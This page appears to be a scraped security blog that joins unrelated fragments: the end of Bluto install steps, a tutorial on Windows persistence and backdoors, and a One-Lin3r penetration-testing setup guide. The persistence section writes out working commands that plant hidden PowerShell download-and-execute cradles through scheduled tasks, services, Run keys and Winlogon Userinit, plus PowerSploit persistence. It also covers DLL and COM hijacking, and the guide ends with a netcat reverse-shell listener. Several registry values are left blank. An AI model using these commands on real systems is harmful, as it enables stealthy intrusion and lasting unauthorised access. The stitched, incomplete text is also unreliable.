(1) Once pip has successfully downloaded and installed, we can install Bluto:

sudo pip install bluto

(2) You should now be able to execute ‘bluto’ from any working directory in any terminal.


Upgrade Instructions

(1) The upgrade process is as simple as;

sudo pip install bluto --upgrade


Common ways to maintaining privilege/access in Windows, Backdoor, Fileless backdoor

In order to be able to protect the system from intrusion, we need to understand how the privilege maintaining works.

Windows Task Scheduler

Use Windows Task Scheduler to launch recurring tasks such as script, software etc.

schtasks /create /sc minute /mo 1 /tn "Update Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"\"\"\"))\""

Note: When execute in command prompt, single quote will be replace to double quot, here we use three double quotes.

This script will launch every 1 minute

Windows Task Scheduler
Windows Task Scheduler

Autostart Service

sc create "Backdoor" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\""
sc description Backdoor "Backdoor Test"        //Description for the service
sc config Backdoor start= auto                //Make it auto-start
net start Backdoor                            //Start the service
Windows Services
Windows Services


We can utilize “powersploit” module from “powersploit”

Import-Module .\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '1 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose


Add backdoor path to auto-run key, to start the backdoor on system boot

Common auto-start keys

# Run Key
# Winlogon\Userinit Key

(There are many other similar keys related to auto-start)

Use following command to create fileless backdoor

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "KeyNameBackdoor" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\"" /f

Logon Scripts Backdoor

Registry path:


Create string key:


Set Value to absolute path:


userinit Fileless Backdoor

When login, winlogon will run specified program. It can be used to Add/Remove program.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
 "Userinit"="C:\Windows\system32\userinit.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(''))\""

Group Policy logon script

Run -> gpedit.msc -> User Configuration -> Scripts (Logon/Logoff)

Windows Local Group Policy Editor
Windows Local Group Policy Editor

Note: Must use full path e.g. “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

DLL Hijacking

If an process is trying to load a dll without absolute path, Windows will try to look for the dll from specified folder. If one of the folders can by modified by the attacker, the malicious dll will be loaded, then the malicious code will be executed.

Common attack like LPK.dll

Windows 7 and up have added KnownDLLs protection, add LPK.dll to following registry key to enable the dll hijacking


Create String type of Key name it


Set the value to


COM hijacking

The key is to create correct dll and choose right CLSID, by changing CLSID key value from registry, CAccPropServicesClass hacking and MMDeviceEnumerator hijacking can be carried out.
Many system processes will invoke them when starting. It can bypass auto-start checks from Autoruns.

Remote Control, Remote Access Trojan (RAT)

RAT is a type of malicious program it includs backdoors on victims’ devices. Usually propagate by normal client requests, e.g. email attachments, game program. etc. Attacker use them on clients’ device to spread RAT, eventually build botnet.

To keep the system safe and away from backdoors, we have to have knowledge in troubleshooting intrusion, keep the system up to date, check server security regularly.

One-Lin3r – Penetration test with one line (Installation on Kali Linux)

One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won’t even need to copy the one-liners).

One-liner functionWhat this function refers to
Reverse ShellVarious methods and commands to give you a reverse shell.
PrivEscMany commands to help in Enumeration and Privilege Escalation
Bind ShellVarious methods and commands to give you a bind shell.
DropperMany ways to download and execute various payload types with various methods.

Install on Kali Linux

1 Launch terminal

2 Install One-Lin3r

~# pip3 install one-lin3r
Install One-Lin3r
Install One-Lin3r

3 Force reinstall “prompt-toolkit”

~# pip3 install prompt-toolkit --force-reinstall
Kali Linux - pip3 install prompt-toolkit --force-reinstall
Kali Linux – pip3 install prompt-toolkit –force-reinstall

Or we will get following error by launch “one-lin3r -h” straight way without reinstalling “prompt-toolkit”

Traceback (most recent call last):
   File "/usr/local/bin/one-lin3r", line 6, in 
     from one_lin3r.main import main
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/main.py", line 3, in 
     from .core import Cli
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/Cli.py", line 6, in 
     from . import utils,db
   File "/usr/local/lib/python3.7/dist-packages/one_lin3r/core/utils.py", line 5, in 
     from prompt_toolkit.shortcuts import CompleteStyle, prompt
 ImportError: cannot import name 'CompleteStyle' from 'prompt_toolkit.shortcuts' (/usr/lib/python3/dist-packages/prompt_toolkit/shortcuts.py)
Kali Linux, one-lin3r -h error
Kali Linux, one-lin3r -h error

4 Try launch one-lin3r -h

~# one-lin3r -h
Kali Linux - one-lin3r -h
Kali Linux – one-lin3r -h

5 Now we can close terminal window then launch from terminal or menu

one-lin3r from menu
one-lin3r from menu
one-lin3r from terminal
one-lin3r from terminal



~# one-lin3r
one-lin3r from terminal
one-lin3r from terminal

Other commands

One-Lin3r  -> list
One-Lin3r -> list
usage: one-lin3r [-h] [-r R] [-x X] [-q]
 optional arguments:
   -h, --help  show this help message and exit
   -r          Execute a resource file (history file).
   -x          Execute a specific command (use ; for multiples).
   -q          Quiet mode (no banner).

More on: github.com/D4Vinci/One-Lin3r


Next we can use nc to listen on the port from the reverse connection (reverse shell)

~# nc -lvp 1500
listening on [any] 1500 …
 nc -lvp 1500
nc -lvp 1500

Once we have connected to the victim then we need to think about privilege escalation, which One-Lin3r also contains some handy privesc commands for us to generate and use

one-lin3r -> search windows privesc
one-lin3r -> search windows privesc